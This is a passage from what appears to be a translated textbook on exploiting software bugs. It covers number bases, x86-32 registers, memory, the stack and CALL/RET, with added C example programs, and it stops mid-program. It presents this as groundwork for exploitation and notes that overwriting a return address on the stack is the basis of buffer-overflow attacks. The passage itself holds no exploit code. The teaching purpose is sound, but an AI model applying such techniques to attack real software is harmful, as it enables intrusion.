
The Art of Exploiting Software Bugs

Nguyễn Thành Nam

28 February 2009
Contents

1 Introduction  7
1.1 Structure of this document  7
1.2 How to use this document effectively  8
2 Computers and compilation  11
2.1 Number bases  11
2.1.1 Converting from any base to base ten  12
2.1.2 Converting between binary and hexadecimal  12
2.1.3 The ASCII table  13
2.2 Computer architecture  13
2.2.1 The processor (Central Processing Unit, CPU)  13
2.2.2 Registers  16
2.2.3 Memory and linear addressing  17
2.2.3.1 Addressing memory cells  17
2.2.3.2 Memory access and little-endianness  17
2.2.4 Instruction set, machine code, and assembly  18
2.2.4.1 Instruction groups  20
2.2.4.2 Syntax  20
2.2.4.3 The stack  21
2.2.4.4 Function call instructions  22
2.3 The compiler and the structure of a function  27
2.3.1 Prologue  27
2.3.2 Body  28
2.3.3 Epilogue  29
2.3.4 Calling a function  29
2.3.5 The frame pointer  30
2.4 Summary and key points  33
3 Buffer overflows  35
3.1 Introduction  35
3.2 Changing the value of a local variable  37
3.3 Passing data into the program  40
3.4 Changing the flow of execution  43
3.4.1 The old technique  43
3.4.2 Control flow  45
3.4.3 Finding the address of the "equal" branch  47
3.4.3.1 With GDB  48
3.4.3.2 With objdump  49
3.4.4 Returning into the function body itself  50
3.5 Returning into the standard library  52
3.5.1 Placing data in the program's memory  52
3.5.1.1 Environment variables  53
3.5.1.2 The executable's file name  55
3.5.1.3 Command-line arguments  55
3.5.1.4 The buf variable itself  55
3.5.2 Returning to the printf call  55
3.5.3 Hunting for the stolen string  57
3.5.4 Back to the example  60
3.5.5 Calling an external program  61
3.5.5.1 When the program name is a  61
3.5.5.2 When the program name is abc  65
3.6 Returning into the standard library several times  68
3.7 Summary and key points  70
4 Format strings  73
4.1 Concept  73
4.2 Scanning the stack  74
4.3 Meeting the input data again  76
4.4 Changing the cookie variable  77
4.4.1 To the value 0x64  78
4.4.2 To the value 0x100  79
4.4.3 To the value 0x300  79
4.4.4 To the value 0x300, using only one %x and one %n  81
4.4.5 To the value 0x87654321  81
4.4.6 To the value 0x12345678  83
4.4.7 To the value 0x04030201  84
4.4.8 Again, with input starting with BLUE MOON  87
4.4.9 To the value 0x69696969  88
4.5 The .dtors section  88
4.6 The GOT  92
4.7 Summary and key points  93
5 Some other kinds of bugs  95
5.1 Race conditions  95
5.2 Off by one  99
5.3 Integer overflow  101
5.4 Summary and key points  102
6 Summary  105
Preface

The goal of this book is to share the skill of exploiting software bugs with readers who are passionate about technology. Through what is presented in The Art of Exploiting Software Bugs, the author hopes to turn knowledge long regarded as magic into science, with concrete numbers and calculation methods that are clear, understandable, and well-founded. With the accompanying DVD, readers can immediately practise the techniques in the book in a VMware virtual machine running the latest Debian release on a Linux 2.6 kernel.
Chapter 1
Introduction

Since their appearance and rise to popularity in the early 1980s, personal computers (which this document also calls simply "computers") have contributed to every aspect of life: manufacturing, business, education, defence, and health care. Fast and accurate computation, portability, and versatility are among the reasons computers are used more and more. Twenty years ago, the fastest way to send a letter several pages long to a distant friend was the post office's express service; today the same thing happens in under 20 seconds by e-mail. Where an accountant once worked through thousands of pages of paper and figures, today a few clicks and commands in a common spreadsheet program give the same result.

Computers could change the face of society and the way it works entirely thanks to the suitability and variety of the applications that run on them. Human-resources software, a bank's fund-management system, and a missile's trajectory control unit are all examples of computer applications. They also show how important computers and digital data have become in our lives. Being employed or unemployed may come down to a single bit flipping from 0 to 1; a bank balance depends on the correctness of the fund-management program; and war between two countries now also takes place in cyberspace.

In today's information age, securing information has become more pressing than ever. But to defend against attackers we first need to understand how software vulnerabilities are exploited. The media regularly report on vulnerabilities and the damage they cause, but because the information they provide is limited, they unintentionally turn purely scientific techniques into something mysterious. Explaining these techniques thoroughly and from first principles is the aim of the book you are holding.
1.1 Structure of this document

This document is divided into four main parts. Chapter 2 presents the basic operating principles of the computer, with subsections on registers, memory, and the basic instructions. An important part of this chapter introduces assembly language and how a compiler translates a high-level language such as C into a lower-level language such as assembly. The conventions for notation and for the memory diagrams used throughout the document are also fixed in this chapter. Chapter 2 is essential as the foundation for the discussions in the later chapters.

The other chapters are self-contained, so readers may skip chapters unrelated to their interests and go straight to the chapter or section they need.

Chapter 3 discusses an especially common class of bug: the buffer overflow. After explaining what a buffer overflow is, the examples in the book cover a few basic principles for exploiting this class of bug, as well as commonly met techniques: controlling the value of a local variable, controlling the instruction pointer, returning into the standard library, and chaining several returns into the standard library.

The second common class of bug, discussed next in Chapter 4, is the format string bug. Although less widespread than buffer overflows, this class is also highly dangerous because it allows an arbitrary value to be written to an arbitrary memory location, and because it is easy to exploit. In that part we therefore examine the nature of format string bugs, the three important unknowns needed to exploit them, exercises in writing a value to a chosen memory location, and the common exploitation paths of writing to the .dtors section and writing to an entry in the GOT.

The last main part covers a few classes of bug that are less common and more specialised, but no less harmful. Chapter 5 discusses race conditions, off-by-one bugs, and integer overflows.

Every chapter ends with a summary and key points section, where the main ideas of the chapter are condensed into bullet points.
1.2 How to use this document effectively

The chapters of this document cover separate topics that do not depend on one another. Readers are nevertheless encouraged to read Chapter 2 first, to build the foundation for the later chapters or at least to become familiar with the notation and conventions used throughout. After that, depending on their goals, readers can continue with the chapters on the topics that concern them.

Although this document can be read like any other, it is far more effective if you read it while practising in the accompanying virtual machine. That environment was designed specifically to make it as convenient as possible to explore and absorb the basic material presented here. All command-line screenshots in the document were taken in this very virtual machine, so the numbers, addresses, and program behaviour shown will hold no surprises.

In every chapter you will meet "Stop and think" boxes. These are questions that consolidate knowledge and deepen understanding, so you are encouraged to stop reading and think about the problem for about 30 minutes before continuing.

    Stop and think
    When you meet a box like this one, you should take a little time to think about the question posed. Here, and only here, you need not.

Each chapter ends with a summary and key points section. If you have too little time to read the whole chapter, this section will help you grasp its ideas in the most systematic and concise way.

With these points noted, we are ready to continue with the structure of the computer.
Chapter 2
Computers and compilation

The ultimate purpose of exploiting a software bug is to make the machine carry out the tasks we want. To do that, we must first know the structure of the computer well: how the processor works, which instructions it can execute, and how instructions are delivered to it. It is much like learning to ride a motorbike: we must know which button starts the engine, which one switches on the indicator, how to turn left, and how to stop.

In this chapter we look at the structure of the computer, in particular the processor (Central Processing Unit, CPU), its registers and its instructions, and linear memory addressing. We then discuss machine code and assembly language, so that we can move on to how a compiler translates a function from C into assembly. The chapter ends with a model of the stack layout (stack diagram) of a sample function with its arguments and local variables.

Throughout this document we discuss only the 32-bit Intel processor architecture.
2.1 Number bases

Before going into the structure of the computer, we need a firm grasp of one foundational topic: number bases. There are three common bases that we use in this document:

Binary is base two, the base used by computers. Each digit can be 0 or 1, and is called a bit. Eight (8) bits form a byte (written B). A kilobyte (KB) is 1024 ($2^{10}$) bytes. A megabyte (MB) is 1024 KB.

Decimal is base ten, the base we humans use every day. Each digit can be 0, 1, 2, 3, 4, 5, 6, 7, 8, or 9.

Hexadecimal is base sixteen, used for calculation in place of binary because it is shorter and easier to convert. Each digit can be 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, or F, where A has the value 10 (decimal), B has the value 11, and likewise for C, D, E, and F.

    Decimal  Hexadecimal  Binary
    0        0            0000
    1        1            0001
    2        2            0010
    3        3            0011
    4        4            0100
    5        5            0101
    6        6            0110
    7        7            0111
    8        8            1000
    9        9            1001
    10       A            1010
    11       B            1011
    12       C            1100
    13       D            1101
    14       E            1110
    15       F            1111

Table 2.1: Conversion between hexadecimal and binary
2.1.1 Converting from any base to base ten

Let the base be $R$ and the number of digits be $n$. Call the least significant digit (usually the rightmost) $x_0$, the most significant digit (usually the leftmost) $x_{n-1}$, and the remaining digits $x_1$ through $x_{n-2}$. The decimal value of the number is then given by:

$$\text{decimal value} = x_0 R^0 + x_1 R^1 + \ldots + x_{n-2} R^{n-2} + x_{n-1} R^{n-1}$$

For example, the decimal value of the binary number 00111001 ($R = 2$, $n = 8$) is $1 \cdot 2^0 + 0 \cdot 2^1 + 0 \cdot 2^2 + 1 \cdot 2^3 + 1 \cdot 2^4 + 1 \cdot 2^5 + 0 \cdot 2^6 + 0 \cdot 2^7 = 57$, and the decimal value of the hexadecimal number 7F ($R = 16$, $n = 2$) is $15 \cdot 16^0 + 7 \cdot 16^1 = 127$.
2.1.2 Converting between binary and hexadecimal

Each hexadecimal digit corresponds to exactly four binary digits, because $16 = 2^4$. To convert between the two bases, we therefore only need to convert each group of four bits according to Table 2.1.

For example, the binary value of the hexadecimal number AF is 10101111, because A corresponds to 1010 and F to 1111; the hexadecimal value of the binary number 01010000 is 50.
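As an added example (my code, not the book's), the C program below implements the digit-weight formula of Section 2.1.1 for any base up to sixteen and the nibble-by-nibble conversion of Section 2.1.2, and rejects digits that are invalid in the requested base; the function names are my own.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Value of one digit in any base up to 16: '0'..'9' -> 0..9, 'A'..'F' (either
 * case) -> 10..15. Returns -1 for a character that is not a digit at all. */
static int digit_value(char ch)
{
    if (ch >= '0' && ch <= '9')
        return ch - '0';
    ch = (char)toupper((unsigned char)ch);
    if (ch >= 'A' && ch <= 'F')
        return ch - 'A' + 10;
    return -1;
}

/* The formula of Section 2.1.1: value = x_0 R^0 + x_1 R^1 + ... + x_{n-1} R^{n-1},
 * with x_0 the rightmost digit. Walking the digits from the left and multiplying
 * the running total by R before adding each digit (Horner's scheme) produces the
 * same sum without computing any R^i explicitly.
 * Sets *ok to 0 and returns 0 when a digit is not valid in the given base. */
unsigned long to_decimal(const char *digits, unsigned radix, int *ok)
{
    unsigned long value = 0;
    *ok = 1;
    for (const char *p = digits; *p; p++) {
        int x = digit_value(*p);
        if (x < 0 || (unsigned)x >= radix) {   /* e.g. '2' is not a binary digit */
            *ok = 0;
            return 0;
        }
        value = value * radix + (unsigned)x;
    }
    return value;
}

/* Hex -> binary (Section 2.1.2): each hex digit becomes exactly four bits because
 * 16 = 2^4, so the string is converted one digit at a time as in Table 2.1.
 * out must hold 4 * strlen(hex) + 1 bytes. Returns out, or NULL on a bad digit. */
char *hex_to_binary(const char *hex, char *out)
{
    char *w = out;
    for (; *hex; hex++) {
        int x = digit_value(*hex);
        if (x < 0)
            return NULL;
        for (int bit = 3; bit >= 0; bit--)
            *w++ = ((x >> bit) & 1) ? '1' : '0';
    }
    *w = '\0';
    return out;
}

/* Binary -> hex: group the bits in fours starting from the right; a leading group
 * shorter than four bits is treated as padded with zeros on the left.
 * out must hold strlen(bin) / 4 + 2 bytes. Returns out, or NULL on a bad digit. */
char *binary_to_hex(const char *bin, char *out)
{
    size_t n = strlen(bin);
    int count = (int)((4 - n % 4) % 4);    /* implicit leading zero bits */
    int nibble = 0;
    char *w = out;
    for (size_t i = 0; i < n; i++) {
        if (bin[i] != '0' && bin[i] != '1')
            return NULL;
        nibble = (nibble << 1) | (bin[i] - '0');
        if (++count == 4) {
            *w++ = "0123456789ABCDEF"[nibble];
            nibble = 0;
            count = 0;
        }
    }
    *w = '\0';
    return out;
}

int main(void)
{
    int ok;
    char buf[64];
    /* The book's worked examples: 00111001 (base 2) = 57, 7F (base 16) = 127. */
    printf("00111001 (base 2)  = %lu\n", to_decimal("00111001", 2, &ok));
    printf("7F (base 16)       = %lu\n", to_decimal("7F", 16, &ok));
    /* AF <-> 10101111 and 01010000 <-> 50, one nibble at a time. */
    printf("AF       -> %s\n", hex_to_binary("AF", buf));
    printf("01010000 -> %s\n", binary_to_hex("01010000", buf));
    return 0;
}
```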
2.1.3 The ASCII table

         0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F
    0
    1
    2
    3    0  1  2  3  4  5  6  7  8  9
    4       A  B  C  D  E  F  G  H  I  J  K  L  M  N  O
    5    P  Q  R  S  T  U  V  W  X  Y  Z
    6       a  b  c  d  e  f  g  h  i  j  k  l  m  n  o
    7    p  q  r  s  t  u  v  w  x  y  z

Table 2.2: Some common values in the ASCII table (row: high hexadecimal digit; column: low hexadecimal digit)

Because the computer understands only the bits 0 and 1, we need a common convention for representing letters such as A, B, C, X, Y, Z. The ASCII table is one such convention. It maps the decimal values below 128 (00 to 7F in hexadecimal) to ordinary text characters. ASCII is so widely used that every modern operating system follows it.

Today we often hear about Unicode, which can represent almost every language in the world; Vietnamese in particular has its own range in that table. Unicode itself uses the ASCII mapping for the characters below 128.

Table 2.2 lists some common values in the ASCII table. According to it, the upper-case letter A has hexadecimal code 41, hexadecimal code 61 corresponds to the lower-case letter a, and hexadecimal code 35 corresponds to the digit 5.

In addition, a few special characters are worth knowing: the string terminator NUL has hexadecimal code 00, the line feed (new line) character has code 0A, the carriage return (move the cursor to the start of the line) has code 0D, and the space character has code 20.

We have now reviewed the basics of number bases and the ASCII table. In the next section we discuss the computer's processor.
2.2 Computer architecture

A computer has three main parts: the processor (CPU), the standard input device (the keyboard), and the standard output device (the screen). We are interested only in the processor, because it is the centre that controls everything the computer does.

2.2.1 The processor (Central Processing Unit, CPU)

The processor reads instructions from memory and executes them continuously, without rest. Which instruction is executed next is decided by the instruction pointer. The instruction pointer is a CPU register that holds the memory address of the next instruction. After the CPU finishes the current instruction, it continues with the instruction at the location the instruction pointer points to.
[Figure 2.1: The instruction pointer. Memory at address 12345678 holds the bytes 31 C0 90 90. (a) About to execute the first instruction: instruction pointer = 12345678. (b) About to execute the second instruction: instruction pointer = 1234567A. (c) After executing the nop: instruction pointer = 1234567B.]

[Figure 2.2: Representation convention. A column of 4-byte cells, with higher addresses (up to FFFFFFFF) at the top and lower addresses (down to 00000000) at the bottom; one cell holds the bytes 41 42 43 44.]
Figure 2.1a assumes the instruction pointer holds the value 12345678, meaning the CPU will execute the instruction at address 12345678. At that address we have the instruction 31 C0 (xor eax, eax). Because this instruction occupies two bytes of memory, after it executes the instruction pointer becomes 12345678 + 2 = 1234567A, as in Figure 2.1b.

At address 1234567A is the instruction 90 (nop). Because nop occupies only one byte, the instruction pointer then points to the next cell, at address 1234567B. Figure 2.1c shows the value of the instruction pointer after the CPU executes the nop of Figure 2.1b.

To make things easier to follow, we adopt the following conventions:

- Numeric values mentioned in this document are written in hexadecimal unless stated otherwise.
- Cells with lower addresses are on the left, cells with higher addresses on the right.
- Cells with lower addresses are at the bottom, cells with higher addresses at the top.
- Sometimes we draw memory as a strip running from left to right, as in Figure 2.1; sometimes we draw it as a box of small compartments, each 04 bytes (32 bits) long, as in Figure 2.2.

From the instruction-pointer example we can see that if we want the CPU to perform some task, two conditions must be met:

1. The instructions to be executed must be placed in memory.
2. The instruction pointer must hold the address of the memory region containing those instructions.
Because executable code and program data both reside in memory, we can load code into a program through ordinary data transfer. This is exactly the von Neumann model of computer architecture, in which the processor is separate from the store that holds both data and code.

Choosing and using code (shellcode) suited to a particular exploitation goal is outside the scope of this document. We will not discuss how to create such code; instead we assume that suitable code has already been loaded into memory. This does not mean that creating code is so simple it can be ignored. On the contrary, it is a very complex subject, with many techniques specific to each machine architecture, each operating system, and even each individual exploitation scenario. Moreover, most common shellcode can be reused in the examples discussed in later sections, so readers can apply it themselves as a small practical exercise.

Assuming the first condition has been satisfied, this document concentrates on the second problem: controlling the machine's flow of execution. In the author's personal opinion this is usually the crux of exploitation, and also the main reason press reports are hard to understand. Practice shows (and the examples will demonstrate) that in most exploitation scenarios, once we control the program's flow of execution we are already 80% of the way to success.

In this section we have referred to the instruction pointer and accepted that it holds the memory address of the next instruction the CPU will execute. So what actually is the instruction pointer?
2.2.2 Registers

The instruction pointer of Section 2.2.1 is in fact one of the registers built into the CPU. A register is a form of high-speed memory located inside the CPU itself. Normally a register is as wide as the CPU architecture.

For the 32-bit Intel architecture, the main groups of registers are listed below; each register is 32 bits wide.

General-purpose registers are used by the CPU as ultra-fast storage for computation, temporary variables, or holding argument values. These registers usually play interchangeable roles. The four we meet most often are EAX, EBX, ECX, and EDX.

String registers are dedicated to string processing, such as copying a string or computing its length. The two commonly met are EDI and ESI.

Stack registers are used to manage the stack memory structure, which is discussed in Subsection 2.2.4.3. The two main ones are EBP and ESP.

Special registers have special duties and usually cannot be assigned directly. The ones we commonly meet are EIP and EFLAGS. EIP is the instruction pointer we already know. EFLAGS holds the flags (one bit each) such as the sign flag, the carry flag, and the zero flag. These flags are changed as a side effect of the main instructions; for example, computing the difference 0 minus 1 sets the carry flag and the sign flag. We use the flag values for conditional jumps, such as "jump if the zero flag is set" or "jump if the carry flag is not set".

Segment registers take part in addressing memory. The ones we commonly meet are DS, ES, and CS. In the 16-bit generations, registers could only address the range 0 to $2^{16} - 1$. To get past this limit, the segment registers were used to assist memory addressing, extending it to $2^{20}$ memory addresses. By the 32-bit generation, modern operating systems no longer need the segment registers to locate memory, because an ordinary register can address $2^{32}$ cells, that is, 4 GB of memory.
2.2.3 Memory and linear addressing

Registers are ultra-fast memory, but unfortunately their capacity is far too small for them to serve as main memory. The main memory we refer to is RAM, commonly 1 or 2 GB in size.

RAM stands for Random Access Memory. It is so named because to access memory we must supply the cell's address before the access, and the access time is the same for every address. Determining the address of a memory cell is therefore important.

2.2.3.1 Addressing memory cells

With the 32-bit generation, operating systems switched to linear addressing in place of segmented addressing. Linear addressing simplifies memory access: we handle a single 32-bit value instead of computing the address from two different registers. For example, to access the first cell we use address 00000000, to access the next cell we use address 00000001, and so on. Each cell lies one unit above the previous one.

When we speak of a memory address, we mean the linear address of RAM. This linear address is not necessarily the physical address of the cell in RAM; it is remapped by the operating system. The remapping of memory addresses is performed by the operating system's virtual memory management.

Such virtual linear addressing lets the operating system extend the physical memory available by using a swap partition. We often see a machine with only 1 GB of RAM whose memory addresses can reach values like BFFFF6E4, that is, a little over 3 GB.

Within these 3 GB, besides data, we also find the program's code. We discuss instructions in Subsection 2.2.4.
2.2.3.2 Memory access and little-endianness

As briefly mentioned, the processor must specify a memory address and be ready to receive data from, or send data to, memory. The CPU is therefore connected to memory by two buses: the data bus and the address bus. To read from memory, the CPU signals that the address is ready on the address bus and asks memory to send the data over the data bus. To write, the CPU asks memory to take the data from the data bus and store it in the cells.

Both the data bus and the address bus are 32 bits wide, so on every memory access the CPU sends or receives 32 bits, making the best use of the bus. This raises the question of data types smaller than 32 bits.

The first question is how the CPU receives 1 byte instead of 4 bytes (32 bits) if everything memory sends to the CPU is 32 bits. The answer is that the CPU receives all 4 bytes from memory but processes only the 1 byte the program asked for. It is like receiving a large crate with only a small item inside.

The second question concerns the position of the 8 bits to be processed within the 32 bits received. How does the CPU know which 8 bits to take? The designers of the 32-bit Intel x86 processors decided to follow little-endianness. Little-endianness is a convention for the order and significance of the bytes in a data representation, in which the byte at the end (the lowest position) is less significant than the byte at the next position.

For example, in Figure 2.3a the four cells starting at address a represent the hexadecimal value 42413938. We see that the byte at the lowest position is the least significant, and the byte at the highest position is the most significant, for this value. Changing the low byte by 1 unit changes the value by $256^0 = 1$ unit, whereas changing the high byte by 1 unit changes the value by $256^3 = 16777216$ units (in decimal).

At the same time, Figure 2.3b shows how the string 89AB, terminated by the NUL character, is represented in memory. We see that each byte of the string (in the figure, the ASCII value of the corresponding character) is placed in memory in exactly that order. Little-endianness is meaningless for a string, because all bytes in a string play the same role; there is no distinction in significance between them.

Through these two figures, readers should also note that the cells may hold the same data (the bytes 38, 39, 41, 42) while the program interprets that data in different ways (as the hexadecimal value 42413938 or as the string 89AB).

Because it follows little-endianness, the CPU takes the value at the low address rather than the high one. In the same example a, if we take 1 byte from the 32 bits of data starting at address a, it has the hexadecimal value 38; 2 bytes have the value 3938; and 4 bytes have the value 42413938.
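As an added example (my code, not the book's), the following C program lays out the bytes of Figure 2.3 in memory and decodes them by hand as 1, 2 and 4 bytes little-endian, as a big-endian value for contrast, and as the string "89AB"; it also checks whether the host CPU itself is little-endian, as x86 is.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The cells of Figure 2.3: bytes 38 39 41 42 at addresses a, a+1, a+2, a+3,
 * followed by a NUL so the same memory can also be read as a C string.
 * (Constructed test data, not a dump from the book's virtual machine.) */
const unsigned char cells[5] = { 0x38, 0x39, 0x41, 0x42, 0x00 };

/* Little-endian decoding done by hand: the byte at the lowest address is the
 * least significant, so the byte at offset i carries the weight 256^i.
 * nbytes is 1, 2 or 4 (a byte, a word or a double word). */
uint32_t le_value(const unsigned char *mem, int nbytes)
{
    uint32_t value = 0;
    for (int i = nbytes - 1; i >= 0; i--)
        value = (value << 8) | mem[i];
    return value;
}

/* Big-endian decoding of the same cells, for contrast: lowest address first. */
uint32_t be_value(const unsigned char *mem, int nbytes)
{
    uint32_t value = 0;
    for (int i = 0; i < nbytes; i++)
        value = (value << 8) | mem[i];
    return value;
}

/* Weight of the byte at offset i in a little-endian value: 256^i.
 * Offset 0 weighs 1, offset 3 weighs 16777216 (decimal). */
uint32_t le_weight(int i)
{
    return (uint32_t)1 << (8 * i);
}

/* 1 if the CPU running this program is little-endian (as Intel x86 is).
 * memcpy is used instead of a pointer cast so the check is well-defined C. */
int host_is_little_endian(void)
{
    uint32_t probe = 0x01020304;
    unsigned char first;
    memcpy(&first, &probe, 1);
    return first == 0x04;
}

/* What a plain 32-bit load of these four bytes yields on this host. */
uint32_t host_load32(const unsigned char *mem)
{
    uint32_t v;
    memcpy(&v, mem, sizeof v);
    return v;
}

int main(void)
{
    printf("1 byte  from a: %02X\n", le_value(cells, 1));          /* 38 */
    printf("2 bytes from a: %04X\n", le_value(cells, 2));          /* 3938 */
    printf("4 bytes from a: %08X\n", le_value(cells, 4));          /* 42413938 */
    printf("same cells read big-endian: %08X\n", be_value(cells, 4));
    printf("same cells as a string: \"%s\"\n", (const char *)cells); /* 89AB */
    printf("this host is %s-endian\n",
           host_is_little_endian() ? "little" : "big");
    return 0;
}
```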
2.2.4 Instruction set, machine code, and assembly

The instruction set is the set of all instructions the CPU can execute. It can be thought of as the computer's vocabulary. Programs are works of literature: they select individual words and join them into a coherent whole that expresses a particular meaning.

Like words in natural language, individual instructions have different lengths (as the example in Figure 2.1 showed). They may occupy 1 or 2 bytes, and sometimes up to 9 bytes. Values such as 90 and 31 C0 are instructions the CPU understands and can execute. These values are called machine code (opcodes). Machine code is also known as the first-generation programming language.
[Figure 2.3: Little-endianness. (a) The value 42413938: the cells at a, a+1, a+2, a+3 hold the bytes 38 39 41 42, lower addresses on the left and higher addresses on the right. (b) The string "89AB": the same cells hold 38 39 41 42 followed by the terminating byte 00.]
Humans, however, would struggle if forced to control the computer directly in machine code. We therefore invented another vocabulary, closer to natural language but retaining the low-level character of machine code. Instead of the value 90 we use the word NOP, for No Operation. In place of 31 C0 we have XOR EAX, EAX, which performs the logical XOR of the EAX register with itself and stores the result back in EAX; in other words, it sets EAX to 0. This vocabulary is clearly easier to understand than those hard-to-remember values. It is called assembly language.

Assembly is regarded as the second-generation programming language. Other languages such as C and Pascal are regarded as third-generation languages because they are closer to natural language than assembly.
2.2.4.1 Instruction groups

Assembly has many groups of instructions. We only touch on the following groups and instructions.

Assignment instructions assign a value to a memory cell or a register, for example LEA, MOV, SETZ.

Arithmetic instructions evaluate arithmetic expressions, for example INC, DEC, ADD, SUB, MUL, DIV.

Logical instructions evaluate logical expressions, for example AND, OR, XOR, NEG.

Comparison instructions compare the values of two operands and update the EFLAGS register, for example TEST, CMP.

Jump instructions change the CPU's flow of execution; they include the unconditional jump JMP and conditional jumps such as JNZ, JZ, JA, JB.

Stack instructions push values onto the stack and pop values off it, for example PUSH, POP, PUSHA, POPA.

Function instructions are used to call a function and to return its result, for example CALL and RET.
2.2.4.2 Syntax

Each assembly instruction takes 0, 1, 2, or at most 3 operands. Most often we meet two-operand instructions of the form ADD dst, src. In this form the arithmetic instruction ADD is applied to the two operands dst and src, and the final result is left in dst, expressing the formula dst = dst + src.

Depending on the instruction, dst and src can take different forms. In general, dst and src have the following forms.

An immediate value is a concrete value such as 6789ABCD. For example, MOV EAX, 6789ABCD assigns the value 6789ABCD to the register EAX. An immediate value cannot play the role of dst.

A register is one of the registers such as EAX, EBX, ECX, EDX. See the example above.

A memory operand is the value at the cell with the specified address. To avoid confusion with an immediate value, the address is enclosed in square brackets. For example, MOV EAX, [6789ABCD] assigns the 32-bit value starting at cell 6789ABCD to EAX. We also meet registers inside memory addresses: MOV EAX, [ECX + EBX] assigns to EAX the 32-bit value starting at the cell whose address is the sum of EBX and ECX. Readers should also note that LEA (Load Effective Address) with the same operands assigns the sum of ECX and EBX itself to EAX, because the address of src is exactly ECX + EBX.
2.2.4.3 The stack

We mentioned the stack while discussing instruction groups in Subsection 2.2.4.1. The stack is a memory region the operating system allocates for the program when it is loaded. The program uses this region to hold local variables and to record the sequence of function calls during execution. In this section we discuss the instructions and special registers that affect the stack.

The stack operates on the Last In, First Out principle: the item pushed last is popped first. The idea is like stacking crates on top of one another: the crate placed last is on top and is unloaded first.

Thus, while using the stack, we always need to know where its top is. The register ESP holds the position of the top of the stack, that is, the address of the item pushed most recently, and is therefore also called the stack pointer.

The operation that places an item on the stack is the PUSH instruction; the operation that takes an item off is the POP instruction. In the 32-bit Intel x86 architecture, when we push a value the CPU performs two small steps in order:

1. ESP is set to ESP - 4, that is, ESP decreases by 4.
2. The operand of PUSH is copied into the 4 bytes of memory starting at the address given by ESP.

Conversely, popping a value makes the CPU perform the two inverse steps:

1. The four bytes of memory starting at the address given by ESP are copied into the operand of POP.
2. ESP is set to ESP + 4, that is, ESP increases by 4.

We notice that on Intel x86 the top of the stack has a lower address than the rest of the stack, because every PUSH lowers the top by 4 units. On other architectures the top of the stack may lie above the rest. Furthermore, because every PUSH or POP changes the stack pointer by 4 units, a stack slot is 4 bytes, or 32 bits, long.
[Figure 2.4: Before and after PUSH EAX. (a) Before: ESP = BFFFF6C0, EAX = 42413938; the four bytes below BFFFF6C0 are undefined (XX XX XX XX). (b) After: ESP = BFFFF6BC, EAX = 42413938; the bytes 38 39 41 42 have been written at BFFFF6BC.]

Assume ESP holds BFFFF6C0 and EAX holds 42413938. Figure 2.4 shows the state of memory and of the registers before and after the instruction PUSH EAX.

Assume the 4 bytes of memory starting at address BFFFF6BC are 38, 39, 41, 42 and ESP holds BFFFF6BC. Figure 2.5 shows the state of memory and of the registers before and after the instruction POP EAX.
2.2.4.4 Function call instructions

The stack holds another piece of information important to the program's flow of execution: the address the instruction pointer moves to after a function finishes normally.

Suppose that in main we call printf to print Hello World! on the screen. After printf completes that task, execution must be handed back to main so it can continue with its next tasks. Figure 2.6 shows the process of calling into and returning from a child function (the callee). We see that on a normal return, execution resumes immediately after the call to printf in main.

Translated into assembly, we get code similar to the following:

    08048446 ADD ESP, -0x0C
    08048449 PUSH 0x08048580
    0804844E CALL printf
    08048453 ADD ESP, 0x10

[Figure 2.5: Before and after POP EAX. (a) Before: ESP = BFFFF6BC, the bytes at BFFFF6BC are 38 39 41 42, EAX = XXXXXXXX (undefined). (b) After: ESP = BFFFF6C0, EAX = 42413938; the bytes remain in memory.]

At address 08048449 the first argument of printf is pushed onto the stack. The value 08048580 is the address of the memory holding the string Hello World!. Next, CALL performs two steps in order:

1. Push the address of the instruction immediately following the CALL (08048453) onto the stack. This step can be understood as PUSH $+5, where $ is the address of the current instruction (0804844E).
2. Move the instruction pointer to the operand, in this example the address of printf.

After finishing its work, printf moves the instruction pointer back to the value CALL saved on the stack by means of the RET instruction. RET performs the two inverse steps:

1. Take the value on top of the stack. This step is like a POP.
2. Set the instruction pointer to the value obtained in step 1.
[Figure 2.6: Calling into and returning from a function. In main, the statement printf("Hello World!") at point A calls into printf; when printf finishes, execution returns to point B, immediately after the call.]

Figures 2.7 and 2.8 show the state of the registers and of memory before and after CALL and RET respectively.

By now, readers may notice that we have three ways to control the program's flow of execution:

1. Through jump instructions such as JMP, JNZ, JA, JB.
2. Through the call instruction CALL.
3. Through the return instruction RET.

In the first two ways, the new value of the instruction pointer is the operand of the instruction and is therefore embedded directly in the machine code. To change the address used by those two ways, we would have to change the instruction. In the last way, the new instruction pointer is taken from the top of the stack. This lets us arrange data so as to influence which instruction executes next. This is the basic principle behind exploiting buffer overflows.

Before we turn to buffer overflows, however, some knowledge of how the compiler translates C into machine code, and of where a function's variables are placed in memory, will help a great deal.
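As an added example (my code, not the book's) serving both Subsection 2.2.4.3 and this one, the C program below models the PUSH, POP, CALL and RET steps on a 32-bit little-endian stack and replays Figures 2.7 and 2.8 with the book's ESP and EIP values; the memory window, the 5-byte CALL length and the marker value in the last function are my assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* A small model of the x86-32 stack machinery of Sections 2.2.4.3 and 2.2.4.4.
 * Only a 256-byte window of memory around the book's ESP value is modelled. */
#define STACK_BASE 0xBFFFF600u
#define STACK_SIZE 256u

typedef struct { uint32_t eip, esp; unsigned char mem[STACK_SIZE]; } Cpu; /* mem[0] = STACK_BASE */

/* Index of a 4-byte slot in the window, or -1 if it lies outside. */
int slot(uint32_t addr) {
    if (addr < STACK_BASE || addr + 4 > STACK_BASE + STACK_SIZE) return -1;
    return (int)(addr - STACK_BASE);
}

/* Little-endian 32-bit store and load (Section 2.2.3.2): the lowest address holds the
 * least significant byte. Both return 0 instead of touching memory outside the window. */
int store32(Cpu *c, uint32_t addr, uint32_t v) {
    int i = slot(addr);
    if (i < 0) return 0;
    for (int k = 0; k < 4; k++) c->mem[i + k] = (unsigned char)(v >> (8 * k));
    return 1;
}

int load32(const Cpu *c, uint32_t addr, uint32_t *v) {
    int i = slot(addr);
    if (i < 0) return 0;
    *v = 0;
    for (int k = 3; k >= 0; k--) *v = (*v << 8) | c->mem[i + k];
    return 1;
}

/* PUSH: first ESP = ESP - 4, then the operand is written to the 4 bytes at [ESP]. */
int push(Cpu *c, uint32_t v) {
    if (!store32(c, c->esp - 4, v)) return 0;   /* would leave the window: refuse */
    c->esp -= 4;
    return 1;
}

/* POP: first the 4 bytes at [ESP] go to the operand, then ESP = ESP + 4. */
int pop(Cpu *c, uint32_t *v) {
    if (!load32(c, c->esp, v)) return 0;
    c->esp += 4;
    return 1;
}

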